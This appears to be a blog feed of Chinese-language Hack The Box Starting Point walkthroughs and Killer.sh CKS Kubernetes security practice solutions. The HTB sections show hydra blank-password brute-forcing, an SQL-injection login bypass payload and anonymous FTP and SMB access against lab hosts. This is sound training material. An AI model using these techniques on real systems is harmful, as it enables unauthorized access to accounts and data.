Task 6 What is one of the higher-privilege sounding usernames in ‘allowed.userlist’ that we download from the FTP server?
admin
Task 7 What version of Apache HTTP Server is running on the target host?
Apache httpd 2.4.41
Task 8 What switch can we use with Gobuster to specify we are looking for specific filetypes?
-x
Task 9 Which PHP file can we identify with directory brute force that will provide the opportunity to authenticate to the web service?
login.php

]]> security HTB HTB Crocodile Hack The Box :: Starting Point - Sequel /archives/security/HTB/start-Sequel.html 扫描，发现3306端口开放

nmap -A 10.129.95.232

start-Sequel-1

弱密码，密码为空，如果破解其他密码可以把 -e nsr 换成字典路径即可

ydra -l root -e nsr mysql://10.129.95.232

start-Sequel-2

登录mysql

mysql -uroot -h 10.129.95.232
    show databases;      #列数据库
    use htb;                    #切换数据库
    show tables;             # 列表
    select * from config;  #获取表中数据

start-Sequel-3

Task 1 During our scan, which port do we find serving MySQL?
3306
Task 2 What community-developed MySQL version is the target running?
MariaDB
Task 3 When using the MySQL command line client, what switch do we need to use in order to specify a login username?
-u
Task 4 Which username allows us to log into this MariaDB instance without providing a password?
root
Task 5 In SQL, what symbol can we use to specify within the query that we want to display everything inside a table?
*
Task 6 In SQL, what symbol do we need to end each query with?
;
Task 7 There are three databases in this MySQL instance that are common across all MySQL instances. What is the name of the fourth that’s unique to this host?
htb

]]> security HTB HTB Sequel Hack The Box :: Starting Point - Appointment /archives/security/HTB/start-Appointment.html 端口扫描

nmap -sV 10.129.24.207

start-Appointment-1

页面为登录页面，根据提示为SQL注入，尝试用 ‘ or 1=1;# 测试

admin
1' or 1=1;#

start-Appointment-2

Task 1 What does the acronym SQL stand for?
Structured Query Language
Task 2 What is one of the most common type of SQL vulnerabilities?
sql injection
Task 3 What does PII stand for?
personally identifiable information
Task 4 What is the 2021 OWASP Top 10 classification for this vulnerability?
A03:2021-Injection
Task 5 What does Nmap report as the service and version that are running on port 80 of the target?
Apache httpd 2.4.38 ((Debian))
Task 6 What is the standard port used for the HTTPS protocol?
443
Task 7 What is a folder called in web-application terminology?
directory
Task 8 What is the HTTP response code is given for ‘Not Found’ errors?
404
Task 9 Gobuster is one tool used to brute force directories on a webserver. What switch do we use with Gobuster to specify we’re looking to discover directories, and not subdomains?
dir
Task 10 What single character can be used to comment out the rest of a line in MySQL?
#
Task 11 If user input is not handled carefully, it could be interpreted as a comment. Use a comment to login as admin without knowing the password. What is the first word on the webpage returned?
Congratulations

]]> security HTB HTB Appointment Hack The Box :: Starting Point - Redeemer /archives/security/HTB/start-Redeemer.html

Which TCP port is open on the machine?

扫描

map -p- --min-rate 5000 -sV 10.129.241.156 --open

start-Redeemer-1

Which service is running on the port that is open on the machine?

redis

What type of database is Redis? Choose from the following options: (i) In-memory Database, (ii) Traditional Database

In-memory Database

Which command-line utility is used to interact with the Redis server? Enter the program name you would enter into the terminal without any arguments.

redis-cli

Which flag is used with the Redis command-line utility to specify the hostname -h

Once connected to a Redis server, which command is used to obtain the information and statistics about the Redis server?

info

start-Redeemer-2

What is the version of the Redis server being used on the target machine?

5.0.7

Which command is used to select the desired database in Redis?

select

How many keys are present inside the database with index 0?

start-Redeemer-3

Which command is used to obtain all the keys in a database?

keys *

start-Redeemer-4

]]> security HTB HTB Redeemer Hack The Box :: Starting Point - Dancing /archives/security/HTB/start-Dancing.html 扫描

nmap --open 10.129.1.125

查看smb服务

smbclient -L 10.129.1.125
#smbclient \\\\IP\\共享目录
smbclient  \\\\10.129.1.125\\WorkShares
    ls #dir也是可以的

start-Dancing-1
start-Dancing-2

TASK 1 What does the 3-letter acronym SMB stand for?
server message block
TASK 2 What port does SMB use to operate at?
445
TASK 3 What is the service name for port 445 that came up in our Nmap scan?
microsoft-ds
TASK 4 What is the ‘flag’ or ‘switch’ we can use with the SMB tool to ‘list’ the contents of the share?
-L
TASK 5 How many shares are there on Dancing?
4
TASK 6 What is the name of the share we are able to access in the end with a blank password?
WorkShares
TASK 7 What is the command we can use within the SMB shell to download the files we find?
get

]]> security HTB HTB Dancing Hack The Box :: Starting Point - Fawn /archives/security/HTB/start-Fawn.html 扫描

nmap --open 10.129.26.35
nmap -A -p 21 10.129.26.35

start-Fawn-1

获取flag

ftp 10.129.26.35
    anonymous
    ls
    get flag.txt
    cat flag.txt

start-Fawn-2

TASK 1 What does the 3-letter acronym FTP stand for?
File Transfer Protocol
TASK 2 Which port does the FTP service listen on usually?
21
TASK 3 What acronym is used for the secure version of FTP?
SFTP
TASK 4 What is the command we can use to send an ICMP echo request to test our connection to the target?
ping
TASK 5 From your scans, what version is FTP running on the target?
vsftpd 3.0.3
TASK 6 From your scans, what OS type is running on the target?
Unix
TASK 7 What is the command we need to run in order to display the ‘ftp’ client help menu?
ftp -h
TASK 8 What is username that is used over FTP when you want to log in without having an account?
anonymous
TASK 9 What is the response code we get for the FTP message ‘Login successful’?
230
TASK 10 There are a couple of commands we can use to list the files and directories available on the FTP server. One is dir. What is the other that is a common way to list files on a Linux system.
ls
TASK 11 What is the command used to download the file we found on the FTP server?
get

]]> security HTB HTB Fawn Hack The Box :: Starting Point - Meow /archives/security/HTB/start-Meow.html 一些名词,比较简单

TASK 1 What does the acronym VM stand for?
Virtual Machine
TASK 2 What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It’s also known as a console or shell.
terminal
TASK 3 What service do we use to form our VPN connection into HTB labs?
openvpn
Task 4 What is the abbreviated name for a ‘tunnel interface’ in the output of your VPN boot-up sequence output?
tun
Task 5 What tool do we use to test our connection to the target with an ICMP echo request?
ping
Task 6 What is the name of the most common tool for finding open ports on a target?
nmap
Task 7 What service do we identify on port 23/tcp during our scans?
telnet
Task 8 What username is able to log into the target over telnet with a blank password?
root

获取flag

nmap 检测 IP 发现开放 23端口
nmap ip --open

star-Meow-1

简单的弱密码测试

hydra -L /usr/share/wordlists/metasploit/http_default_users.txt -e nsr telnet://10.129.40.120

这样的结果表名用户名是 root 密码为空

star-Meow-2

使用telnet 登陆并查看flag

telnet 10.129.40.120

root  # 登陆用户
ls
cat flag.txt

star-Meow-3

]]> security HTB HTB Meow Hack The Box 初次使用 /archives/security/HTB/start.html 登陆后, 点击右侧的 Lab --> STARTING POINT

start-0

点击第一个

start-1

使用openvpn配置文件进行连接

start-2

下载配置文件

start-3

使用配置文件

下载openvpn 客户端 https://openvpn.net/

start-4

Linux
参考 : https://community.openvpn.net/openvpn/wiki/OpenVPN3Linux

使用:

openvpn xxx.ovpn

Windows
https://openvpn.net/downloads/openvpn-connect-v3-windows.msi

使用: 安装以后导入下载的配置文件,然后点击连接

start-5

开启靶场虚拟机左上角点击 Start point 可以查看当前连接情况, 当连接以后,就可以开启靶场了

start-6

点击 spawn machine 开机

start-7

稍等片刻出现IP地址就可以了进行测试了, 后面分别时重启和关机

start-8

]]> security HTB HTB CKS 模拟真题 Killer.sh | Preview Question 3 /archives/kubernetes/CKS/miner.html Use context: kubectl config use-context workload-stage

A security scan result shows that there is an unknown miner process running on one of the Nodes in cluster3. The report states that the process is listening on port 6666. Kill the process and delete the binary.

译文

使用上下文: kubectl config use-context workload-stage

安全扫描结果显示，集群3中的一个节点上有一个未知的挖矿进程在运行。报告指出，该进程正在监听6666端口。杀死该进程并删除二进制文件。

解答

检查node

k get node

miner-0

检查master节点

ssh cluster3-controlplane1

netstat -plnt | grep 6666

miner-1

检查 node节点

ssh cluster3-node1
netstat -plnt | grep 6666

miner-2

使用lsof 检查进程 , 查看路径, 删除对应的文件

lsof -i :6666
ls -lh /proc/9591/exe
kill -9 9591
rm /bin/system-atm

miner-3
miner-4
miner-5

]]> kubernetes CKS K8s Killer.sh CKS CKS 模拟真题 Killer.sh | Preview Question 2 /archives/kubernetes/CKS/open-policy-agent-2.html Use context: kubectl config use-context infra-prod

There is an existing Open Policy Agent + Gatekeeper policy to enforce that all Namespaces need to have label security-level set. Extend the policy constraint and template so that all Namespaces also need to set label management-team . Any new Namespace creation without these two labels should be prevented.

Write the names of all existing Namespaces which violate the updated policy into /opt/course/p2/fix-namespaces .

译文

使用上下文: kubectl config use-context infra-prod

有一个现有的Open Policy Agent + Gatekeeper策略来强制执行,所有Namespace需要设置标签 security-level 。扩展策略约束和模板，所有 Namespaces 也需要设置标签 management-team 。阻止创建任何没有这两个标签的新命名空间。

将所有违反更新策略的现有 Namespace 的名称写入 /opt/course/p2/fix-namespaces 中。

解答

检查现有opa限制

k get crd

k get constraint

检查违规情况

k describe requiredlabels namespace-mandatory-labels

open-policy-agent-2-0

看到命名空间 sidecar-injector 有一处违规

k get ns --show-labels

open-policy-agent-2-1

当我们试图创建一个没有任何标签的命名空间的时候,提示OPA错误

k create ns test

open-policy-agent-2-3

编辑约束添加另外一个标签

k edit requiredlabels namespace-mandatory-labels

# kubectl edit requiredlabels namespace-mandatory-labels
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: RequiredLabels
metadata:
  annotations:
    kubectl.kubernetes.io/last-applied-configuration: |
      {"apiVersion":"constraints.gatekeeper.sh/v1beta1","kind":"RequiredLabels","metadata":{"annotations":{},"name":"namespace-mandatory-labels"},"spec":{"match":{"kinds":[{"apiGroups":[""],"kinds":["Namespace"]}]},"parameters":{"labels":["security-level"]}}}
  creationTimestamp: "2020-09-14T19:29:53Z"
  generation: 1
  name: namespace-mandatory-labels
  resourceVersion: "3081"
  selfLink: /apis/constraints.gatekeeper.sh/v1beta1/requiredlabels/namespace-mandatory-labels
  uid: 2a51a291-e07f-4bab-b33c-9b8c90e5125b
spec:
  match:
    kinds:
    - apiGroups:
      - ""
      kinds:
      - Namespace
  parameters:
    labels:
    - security-level
    - management-team # add

检查

k get constrainttemplates

k edit constrainttemplates requiredlabels

# kubectl edit constrainttemplates requiredlabels
apiVersion: templates.gatekeeper.sh/v1beta1
kind: ConstraintTemplate
...
spec:
  crd:
    spec:
      names:
        kind: RequiredLabels
      validation:
        openAPIV3Schema:
          properties:
            labels:
              items: string
              type: array
  targets:
  - rego: |
      package k8srequiredlabels

      violation[{"msg": msg, "details": {"missing_labels": missing}}] {
        provided := {label | input.review.object.metadata.labels[label]}
        required := {label | label := input.parameters.labels[_]}
        missing := required - provided
        # count(missing) == 1 # 注释后添加下面一行
        count(missing) > 0    # 添加
        msg := sprintf("you must provide labels: %v", [missing])
      }
    target: admission.k8s.gatekeeper.sh

检查

k describe requiredlabels namespace-mandatory-labels

open-policy-agent-2-4

违规命名空间写入文件

# /opt/course/p2/fix-namespaces
sidecar-injector
jeffs-playground

]]> kubernetes CKS K8s Killer.sh CKS CKS 模拟真题 Killer.sh | Preview Question 1 /archives/kubernetes/CKS/RBAC-2.html Use context: kubectl config use-context infra-prod

You have admin access to cluster2. There is also context gianna@infra-prod which authenticates as user gianna with the same cluster.

There are existing cluster-level RBAC resources in place to, among other things, ensure that user gianna can never read Secret contents cluster-wide. Confirm this is correct or restrict the existing RBAC resources to ensure this.

I addition, create more RBAC resources to allow user gianna to create Pods and Deployments in Namespaces security , restricted and internal . It’s likely the user will receive these exact permissions as well for other Namespaces in the future.

译文

使用上下文: kubectl config use-context infra-prod

你有 cluster2 的管理权限。还有一个context gianna@infra-prod ，它以用户gianna的身份认证同一个集群。

现有的集群级RBAC资源已经到位，除其他外，确保用户gianna永远不能读取整个集群的秘密内容。确认这一点是正确的，或者限制现有的RBAC资源以确保这一点。

此外，创建更多的RBAC资源，允许用户gianna在名字空间的 security , restricted ,internal 创建Pod和部署。在未来，该用户很可能也会在其他命名空间获得这些确切的权限。

解答

检查已经存在的RBAC规则

k get clusterrolebinding -oyaml | grep gianna -A10 -B20

k edit clusterrolebinding gianna

k edit clusterrole gianna

k auth can-i list secrets --as gianna

k auth can-i get secrets --as gianna

k config use-context gianna@infra-prod
k -n security get secrets
k -n security get secret kubeadmin-token
k -n security get secrets -oyaml | grep password

RBAC-2-0
RBAC-2-1

编辑规则

k config use-context infra-prod # 回到 admin 环境

k edit clusterrole gianna

# kubectl edit clusterrole gianna
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  creationTimestamp: "2020-09-26T13:57:55Z"
  name: gianna
  resourceVersion: "4496"
  selfLink: /apis/rbac.authorization.k8s.io/v1/clusterroles/gianna
  uid: b713c1cf-87e5-4313-808e-1a51f392adc0
rules:
- apiGroups:
  - ""
  resources:
#  - secrets       # remove
  - configmaps
  - pods
  - namespaces
  verbs:
  - list

创建其他 RBAC 规则

绑定规则	适用范围	应用范围
Role + RoleBinding	单一命名空间	单一命名空间
ClusterRole + ClusterRoleBinding	全集群	全集群
ClusterRole + RoleBinding	全集群	单独命名空间
Role + ClusterRoleBinding	不可用	全集群

创建一个规则

k create clusterrole gianna-additional --verb=create --resource=pods --resource=deployments

# kubectl create clusterrole gianna-additional --verb=create --resource=pods --resource=deployments
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  creationTimestamp: null
  name: gianna-additional
rules:
- apiGroups:
  - ""
  resources:
  - pods
  verbs:
  - create
- apiGroups:
  - apps
  resources:
  - deployments
  verbs:
  - create

创建3个绑定

k -n security create rolebinding gianna-additional \
--clusterrole=gianna-additional --user=gianna

k -n restricted create rolebinding gianna-additional \
--clusterrole=gianna-additional --user=gianna

k -n internal create rolebinding gianna-additional \
--clusterrole=gianna-additional --user=gianna

# k -n security create rolebinding gianna-additional --clusterrole=gianna-additional --user=gianna
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  creationTimestamp: null
  name: gianna-additional
  namespace: security
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: gianna-additional
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: User
  name: gianna

测试

k -n default auth can-i create pods --as gianna
#no

k -n security auth can-i create pods --as gianna
#yes

k -n restricted auth can-i create pods --as gianna
#yes

k -n internal auth can-i create pods --as gianna
#yes

]]> kubernetes CKS K8s Killer.sh CKS CKS 模拟真题 Killer.sh | Question 22 | Manual Static Security Analysis /archives/kubernetes/CKS/check-dockerfile-2.html (can be solved in any kubectl context)

The Release Engineering Team has shared some YAML manifests and Dockerfiles with you to review. The files are located under /opt/course/22/files .

As a container security expert, you are asked to perform a manual static analysis and find out possible security issues with respect to unwanted credential exposure. Running processes as root is of no concern in this task.

Write the filenames which have issues into /opt/course/22/security-issues .

NOTE: In the Dockerfile and YAML manifests, assume that the referred files, folders, secrets and volume mounts are present. Disregard syntax or logic errors.

译文

(可以在任何kubectl环境下解决)

发布工程团队已经分享了一些YAML清单和Dockerfiles，供你查阅。这些文件位于/opt/course/22/files下。

作为一名容器安全专家，你被要求进行手动静态分析，并找出可能存在的与不需要的凭证暴露有关的安全问题。在这项任务中，以root身份运行进程是不需要担心的。

把有问题的文件名写进 /opt/course/22/security-issues 。

注意：在Dockerfile和YAML清单中，假设所指的文件、文件夹、机密和卷挂载都存在。不考虑语法或逻辑错误。

参考

https://docs.docker.com/develop/develop-images/dockerfile_best-practices

https://kubernetes.io/docs/concepts/configuration/overview

解答

查看文件, 供三个dockerfile 7个 k8s yaml

ls -la /opt/course/22/files

check-dockerfile-2-0

1 Dockerfile-mysql

Dockerfile-mysql文件在第一眼看上去可能是无辜的。它复制了一个文件的秘密令牌，使用它并在之后将其删除。但由于Docker的工作方式，每一个RUN、COPY和ADD命令都会创建一个新的层，并且每一个层都会在镜像中被持久化。

这意味着即使文件密令在Z层被删除，它仍然包括在X层和Y层的镜像中。在这种情况下，最好使用示例变量递给Docker。

# /opt/course/22/files/Dockerfile-mysql
FROM ubuntu

# Add MySQL configuration
COPY my.cnf /etc/mysql/conf.d/my.cnf
COPY mysqld_charset.cnf /etc/mysql/conf.d/mysqld_charset.cnf

RUN apt-get update && \
    apt-get -yq install mysql-server-5.6 &&

# Add MySQL scripts
COPY import_sql.sh /import_sql.sh
COPY run.sh /run.sh

# Configure credentials
COPY secret-token .                                       # LAYER X
RUN /etc/register.sh ./secret-token                       # LAYER Y
RUN rm ./secret-token # delete secret token again         # LATER Z

EXPOSE 3306
CMD ["/run.sh"]

存在问题,所以写文件名到文件

echo Dockerfile-mysql >> /opt/course/22/security-issues

2 deployment-redis.yaml

文件 deployment-redis.yaml 正在从一个名为mysecret的Secret中获取证书，并将这些证书写入环境变量中。到目前为止还不错，但在容器的命令中，这些日志可以被任何有访问权限的用户直接读取。

# /opt/course/22/files/deployment-redis.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx-deployment
  labels:
    app: nginx
spec:
  replicas: 3
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
      - name: mycontainer
        image: redis
        command: ["/bin/sh"]
        args:
        - "-c"
        - "echo $SECRET_USERNAME && echo $SECRET_PASSWORD && docker-entrypoint.sh" # NOT GOOD
        env:
        - name: SECRET_USERNAME
          valueFrom:
            secretKeyRef:
              name: mysecret
              key: username
        - name: SECRET_PASSWORD
          valueFrom:
            secretKeyRef:
              name: mysecret
              key: password

日志中记录凭证是不对的

echo deployment-redis.yaml >> /opt/course/22/security-issues

3 statefulset-nginx.yaml

密码直接暴露在容器的环境变量定义中。

# /opt/course/22/files/statefulset-nginx.yaml
...
apiVersion: apps/v1
kind: StatefulSet
metadata:
  name: web
spec:
  serviceName: "nginx"
  replicas: 2
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
      - name: nginx
        image: k8s.gcr.io/nginx-slim:0.8
        env:
        - name: Username
          value: Administrator
        - name: Password
          value: MyDiReCtP@sSw0rd               # NOT GOOD
        ports:
        - containerPort: 80
          name: web

echo statefulset-nginx.yaml >> /opt/course/22/security-issues

# /opt/course/22/security-issues
Dockerfile-mysql
deployment-redis.yaml
statefulset-nginx.yaml

]]> kubernetes CKS K8s Killer.sh CKS CKS 模拟真题 Killer.sh | Question 21 | Image Vulnerability Scanning /archives/kubernetes/CKS/trivy-scan-2.html Task weight: 2%

(can be solved in any kubectl context)

The Vulnerability Scanner trivy is installed on your main terminal. Use it to scan the following images for known CVEs:

nginx:1.16.1-alpine
k8s.gcr.io/kube-apiserver:v1.18.0
k8s.gcr.io/kube-controller-manager:v1.18.0
docker.io/weaveworks/weave-kube:2.7.0

Write all images that don’t contain the vulnerabilities CVE-2020-10878 or CVE-2020-1967 into /opt/course/21/good-images .

译文

任务权重：2

(可以在任何kubectl环境下解决)

漏洞扫描器 trivy 被安装在你的主终端上。用它来扫描以下镜像中的已知CVEs。

nginx:1.16.1-alpine
k8s.gcr.io/kube-apiserver:v1.18.0
k8s.gcr.io/kube-controller-manager:v1.18.0
docker.io/weaveworks/weave-kube:2.7.0

将所有不包含 CVE-2020-10878 或 CVE-2020-1967 漏洞的图像写入 /opt/course/21/good-images 中。

解答

通过脚本批量实现

vim images.txt

nginx:1.16.1-alpine
k8s.gcr.io/kube-apiserver:v1.18.0
k8s.gcr.io/kube-controller-manager:v1.18.0
docker.io/weaveworks/weave-kube:2.7.0

for i in `cat images.txt`; do echo  $i ;trivy image $i | grep -iE 'CVE-2020-10878|CVE-2020-1967' ; echo  ; done

trivy-scan-2-0

没有漏洞的镜像写入文件 /opt/course/21/good-images

# /opt/course/21/good-images
docker.io/weaveworks/weave-kube:2.7.0

]]> kubernetes CKS K8s Killer.sh CKS CKS 模拟真题 Killer.sh | Question 20 | Update Kubernetes 升级k8s集群 /archives/kubernetes/CKS/update-cluster.html Task weight: 8%

Use context: kubectl config use-context workload-stage

The cluster is running Kubernetes 1.25.5 , update it to 1.26.0 .

Use apt package manager and kubeadm for this.

Use ssh cluster3-controlplane1 and ssh cluster3-node1 to connect to the instances.

译文

任务权重：8%。

使用环境: kubectl config use-context workload-stage

该集群正在运行Kubernetes 1.25.5 ，请将其更新为 1.26.0 。

为此使用 apt 软件包管理器和 kubeadm 。

使用 ssh cluster3-controlplane1 和 ssh cluster3-node1 来连接到实例。

解答

检查版本

kubectl get node

update-cluster-0

首先需要更新控制平面节点, 驱逐上面的pod

kubectl cordon cluster3-controlplane1
kubectl drain cluster3-controlplane1 --ignore-daemonsets

连接到 master 检查 kubeadm kubelet 版本

ssh cluster3-controlplane1

kubeadm version
kubelet --version

update-cluster-1

如果kubeadm没有安装更新版本可以使用下面命令进行安装

apt-mark unhold kubeadm
apt-mark hold kubectl kubelet
apt install kubeadm=1.26.0-00
apt-mark hold kubeadm

检查kubeadm升级计划

kubeadm upgrade plan

升级

kubeadm upgrade apply v1.26.0

升级 kubelet 和kubectl

apt update
apt-mark unhold kubelet kubectl
apt install kubelet=1.26.0-00 kubectl=1.26.0-00 -y
apt-mark hold kubelet kubectl
service kubelet restart
service kubelet status
kubectl uncordon cluster3-controlplane1
kubectl get node

其次升级 worker 节点

kubectl get node
kubectl cordon cluster3-node1
kubectl drain cluster3-node1 --ignore-daemonsets

ssh cluster3-node1

apt update
apt-mark unhold kubeadm
apt-mark hold kubectl kubelet
apt install kubeadm=1.26.0-00
apt-mark hold kubeadm
kubeadm upgrade node

apt-mark unhold kubectl kubelet
apt install kubelet=1.26.0-00 kubectl=1.26.0-00
service kubelet restart
service kubelet status

kubectl get node
kubectl uncordon cluster3-node1

]]> kubernetes CKS K8s Killer.sh CKS CKS 模拟真题 Killer.sh | Question 19 | Immutable Root FileSystem /archives/kubernetes/CKS/root-filesystem.html Task weight: 2%

Use context: kubectl config use-context workload-prod

The Deployment immutable-deployment in Namespace team-purple should run immutable, it’s created from file /opt/course/19/immutable-deployment.yaml . Even after a successful break-in, it shouldn’t be possible for an attacker to modify the filesystem of the running container.

Modify the Deployment in a way that no processes inside the container can modify the local filesystem, only /tmp directory should be writeable. Don’t modify the Docker image.

Save the updated YAML under /opt/course/19/immutable-deployment-new.yaml and update the running Deployment.

译文

任务权重：2

使用环境: kubectl config use-context workload-prod

名称空间 team-purple 中的部署 immutable-deployment 应该是不可变的，它是由 /opt/course/19/immutable-deployment.yaml 文件创建的。即使在成功入侵后，攻击者也不可能修改运行中的容器的文件系统。

修改部署的方式，使容器内的任何进程都不能修改本地文件系统，只有 /tmp 目录是可写的。不要修改Docker镜像。

将更新后的YAML保存在 /opt/course/19/immutable-deployment-new.yaml 下，并更新运行中的Deployment。

解答

检查deploy

k -n team-purple edit deploy -o yaml

# kubectl -n team-purple edit deploy -o yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  namespace: team-purple
  name: immutable-deployment
  labels:
    app: immutable-deployment
  ...
spec:
  replicas: 1
  selector:
    matchLabels:
      app: immutable-deployment
  template:
    metadata:
      labels:
        app: immutable-deployment
    spec:
      containers:
      - image: busybox:1.32.0
        command: ['sh', '-c', 'tail -f /dev/null']
        imagePullPolicy: IfNotPresent
        name: busybox
      restartPolicy: Always

编辑静态配置文件

cp /opt/course/19/immutable-deployment.yaml /opt/course/19/immutable-deployment-new.yaml

vim /opt/course/19/immutable-deployment-new.yaml

# /opt/course/19/immutable-deployment-new.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  namespace: team-purple
  name: immutable-deployment
  labels:
    app: immutable-deployment
spec:
  replicas: 1
  selector:
    matchLabels:
      app: immutable-deployment
  template:
    metadata:
      labels:
        app: immutable-deployment
    spec:
      containers:
      - image: busybox:1.32.0
        command: ['sh', '-c', 'tail -f /dev/null']
        imagePullPolicy: IfNotPresent
        name: busybox
        securityContext:                  # add
          readOnlyRootFilesystem: true    # add
        volumeMounts:                     # add
        - mountPath: /tmp                 # add
          name: temp-vol                  # add
      volumes:                            # add
      - name: temp-vol                    # add
        emptyDir: {}                      # add
      restartPolicy: Always

应用文件, 删除先前创建的deployment 并创建新的deployment

k delete -f /opt/course/19/immutable-deployment-new.yaml
k create -f /opt/course/19/immutable-deployment-new.yaml

验证

log-audit-3-0

]]> kubernetes CKS K8s Killer.sh CKS CKS 模拟真题 Killer.sh | Question 18 | Investigate Break-in via Audit Log /archives/kubernetes/CKS/log-audit-3.html Task weight: 4%

Use context: kubectl config use-context infra-prod

Namespace security contains five Secrets of type Opaque which can be considered highly confidential. The latest Incident-Prevention-Investigation revealed that ServiceAccount p.auster had too broad access to the cluster for some time. This SA should’ve never had access to any Secrets in that Namespace.

Find out which Secrets in Namespace security this SA did access by looking at the Audit Logs under /opt/course/18/audit.log .

Change the password to any new string of only those Secrets that were accessed by this SA.

You can use jq to render json more readable. cat data.json | jq

译文

任务权重：4%。

使用环境: kubectl config use-context infra-prod

名称空间 security 包含五个Opaque类型的Secrets，可以认为是高度机密。最新的事件预防调查显示，ServiceAccount p.auster 在一段时间内对集群的访问过于广泛。这个SA本不应该访问该命名空间的任何秘密。

通过查看 /opt/course/18/audit.log 下的审计日志，找出这个SA确实访问了名称空间安全中的哪些秘密。

把密码改成任何新的字符串，只有那些被这个SA访问过的Secrets。

你可以使用jq来使json更加可读。cat data.json | jq

解答

k -n security get secret | grep Opaque

log-audit-3-1

grep 'p.auster' /opt/course/18/audit.log | grep Secret | wc -l
grep 'p.auster' /opt/course/18/audit.log | grep Secret | grep list | wc -l
grep 'p.auster' /opt/course/18/audit.log | grep Secret | grep get  | wc -l

cat audit.log | grep "p.auster" | grep Secret | grep get | jq

{
  "kind": "Event",
  "apiVersion": "audit.k8s.io/v1",
  "level": "RequestResponse",
  "auditID": "74fd9e03-abea-4df1-b3d0-9cfeff9ad97a",
  "stage": "ResponseComplete",
  "requestURI": "/api/v1/namespaces/security/secrets/vault-token",
  "verb": "get",
  "user": {
    "username": "system:serviceaccount:security:p.auster",
    "uid": "29ecb107-c0e8-4f2d-816a-b16f4391999c",
    "groups": [
      "system:serviceaccounts",
      "system:serviceaccounts:security",
      "system:authenticated"
    ]
  },
...
  "userAgent": "curl/7.64.0",
  "objectRef": {
    "resource": "secrets",
    "namespace": "security",
    "name": "vault-token",
    "apiVersion": "v1"
  },
 ...
}
{
  "kind": "Event",
  "apiVersion": "audit.k8s.io/v1",
  "level": "RequestResponse",
  "auditID": "aed6caf9-5af0-4872-8f09-ad55974bb5e0",
  "stage": "ResponseComplete",
  "requestURI": "/api/v1/namespaces/security/secrets/mysql-admin",
  "verb": "get",
  "user": {
    "username": "system:serviceaccount:security:p.auster",
    "uid": "29ecb107-c0e8-4f2d-816a-b16f4391999c",
    "groups": [
      "system:serviceaccounts",
      "system:serviceaccounts:security",
      "system:authenticated"
    ]
  },
...
  "userAgent": "curl/7.64.0",
  "objectRef": {
    "resource": "secrets",
    "namespace": "security",
    "name": "mysql-admin",
    "apiVersion": "v1"
  },
...
}

我们看到，secret vault-token 和 mysql-admin 被 p.auster访问。因此，我们需要改变这些密码。

echo new-vault-pass | base64
#bmV3LXZhdWx0LXBhc3MK

echo new-mysql-pass | base64
#bmV3LW15c3FsLXBhc3MK

k -n security edit secret vault-token
k -n security edit secret mysql-admin

]]> kubernetes CKS K8s Killer.sh CKS CKS 模拟真题 Killer.sh | Question 17 | Audit Log Policy /archives/kubernetes/CKS/log-audit-2.html Task weight: 7%

Use context: kubectl config use-context infra-prod

Audit Logging has been enabled in the cluster with an Audit Policy located at /etc/kubernetes/audit/policy.yaml on cluster2-controlplane1 .

Change the configuration so that only one backup of the logs is stored.

Alter the Policy in a way that it only stores logs:

From Secret resources, level Metadata
From “system:nodes” userGroups, level RequestResponse

After you altered the Policy make sure to empty the log file so it only contains entries according to your changes, like using truncate -s 0 /etc/kubernetes/audit/logs/audit.log .

译文

任务权重: 7%

使用环境: kubectl config use-context infra-prod

审计日志已经在集群中启用，审计策略位于 /etc/kubernetes/audit/policy.yaml ，在 cluster2-controlplane1 上。

改变配置，使日志只有一个备份被存储。

改变策略的方式，使其只存储日志。

从秘密资源，更改 Metadata
从 “system:nodes “用户组，更改 RequestResponse。更改策略后，确保清空日志文件，使其只包含与你的更改有关的条目，如使用 truncate -s 0 /etc/kubernetes/audit/logs/udit.log 。

你可以使用jq来使json更加可读. cat data.json | jq

解答

检查apiserver 配置文件并进行更改

ssh cluster2-controlplane1

cp /etc/kubernetes/manifests/kube-apiserver.yaml ~/17_kube-apiserver.yaml
vim /etc/kubernetes/manifests/kube-apiserver.yaml

# /etc/kubernetes/manifests/kube-apiserver.yaml 
apiVersion: v1
kind: Pod
metadata:
  annotations:
    kubeadm.kubernetes.io/kube-apiserver.advertise-address.endpoint: 192.168.100.21:6443
  creationTimestamp: null
  labels:
    component: kube-apiserver
    tier: control-plane
  name: kube-apiserver
  namespace: kube-system
spec:
  containers:
  - command:
    - kube-apiserver
    - --audit-policy-file=/etc/kubernetes/audit/policy.yaml
    - --audit-log-path=/etc/kubernetes/audit/logs/audit.log
    - --audit-log-maxsize=5
    - --audit-log-maxbackup=1                                    # 更改
    - --advertise-address=192.168.100.21
    - --allow-privileged=true
...

vim /etc/kubernetes/audit/policy.yaml

# /etc/kubernetes/audit/policy.yaml
apiVersion: audit.k8s.io/v1
kind: Policy
rules:
- level: Metadata

添加相关内容

# /etc/kubernetes/audit/policy.yaml
apiVersion: audit.k8s.io/v1
kind: Policy
rules:

# log Secret resources audits, level Metadata
- level: Metadata
  resources:
  - group: ""
    resources: ["secrets"]

# log node related audits, level RequestResponse
- level: RequestResponse
  userGroups: ["system:nodes"]

# for everything else don't log anything
- level: None

重启api-server 并观察变化

cd /etc/kubernetes/manifests/

mv kube-apiserver.yaml ..
watch crictl ps # 等待apiserver就绪
truncate -s 0 /etc/kubernetes/audit/logs/audit.log #写日志
mv ../kube-apiserver.yaml .

jq格式化查看

cat audit.log | tail | jq

# 显示 secret
cat audit.log | grep '"resource":"secrets"' | wc -l

# metadata级别 secret
cat audit.log | grep '"resource":"secrets"' | grep -v '"level":"Metadata"' | wc -l

# RequestResponse
cat audit.log | grep -v '"level":"RequestResponse"' | wc -l

# 仅显示 system:nodes 的 RequestResponse
cat audit.log | grep '"level":"RequestResponse"' | grep -v "system:nodes" | wc -l

